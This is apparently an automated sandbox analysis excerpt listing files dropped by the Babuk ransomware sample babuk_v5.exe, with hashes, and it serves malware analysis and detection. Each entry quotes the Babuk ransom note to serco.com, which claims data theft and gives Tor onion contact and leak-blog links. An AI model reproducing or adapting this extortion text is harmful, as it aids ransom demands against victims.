                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!006\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!006\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!006\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!006\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!006\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Extensions\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\History\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\History\container.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.493657916904638
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlJ0vjOguA1+t71yWSP/0B4Pt7ykXblxW2+UchjtygnVAsP4XwIDf/l8LUxNvEEn:2CguZwWbU3XW2+agnVBu58L0vtn
                                                                            MD5:E8E45B7AC16CA6F71E6E82D9138375FF
                                                                            SHA1:A80D50DD9B6669DB60E8128B3A00C7AABAC693AF
                                                                            SHA-256:8C7E1671D284B193E6DA51010C702208D22B007AA0AA3931D8B6C008B8FC6441
                                                                            SHA-512:0D7C965DB42D83C0DC8969EF51C0D042073627F8E5483B96BDFF1BF339526DAA91791C6E399BFB798C3CD257ADFD4C937B267FB2DB720B6202AEE73240E210BD
                                                                            Malicious:false
                                                                            Preview: ....T..8.......x.7m..........W..6.Q@..brfw.2..q.xn..F..W=R..Zh.o.d0"kE...6.x.>...W..-G..G;...E........Lh.......B J..N.rl.2{F..i.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\PlayReady\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\PlayReady\InPrivate\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
